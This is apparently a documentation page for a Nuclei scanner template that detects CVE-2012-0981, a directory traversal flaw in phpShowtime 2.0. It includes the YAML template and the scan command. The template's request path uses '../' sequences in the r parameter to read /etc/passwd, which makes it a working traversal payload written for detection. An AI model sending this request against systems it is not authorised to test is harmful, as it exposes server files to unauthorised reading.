phpShowtime 2.0 - Directory Traversal
ID: CVE-2012-0981
Severity: medium
Author: daffainfo
Tags: cve,cve2012,phpshowtime,edb,lfi,kybernetika
Description
Section titled “Description”A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.
YAML Source
Section titled “YAML Source”id: CVE-2012-0981
info: name: phpShowtime 2.0 - Directory Traversal author: daffainfo severity: medium description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. impact: | An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: | Upgrade to a patched version of phpShowtime or apply the necessary security patches to fix the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/18435 - https://nvd.nist.gov/vuln/detail/CVE-2012-0981 - http://www.exploit-db.com/exploits/18435 - https://exchange.xforce.ibmcloud.com/vulnerabilities/72824 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2012-0981 cwe-id: CWE-22 epss-score: 0.01277 epss-percentile: 0.85703 cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: kybernetika product: phpshowtime tags: cve,cve2012,phpshowtime,edb,lfi,kybernetika
http: - method: GET path: - "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a0047304502206e8cc31e30fb5fd6b733ceb087b6769d50b01bfa5e34ea83ed137ceadb37a3d00221008b092e4c133668ea13f257c9f12f361f5590e588c3e5852cd0b6cd97f04e9ae3:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2012/CVE-2012-0981.yaml"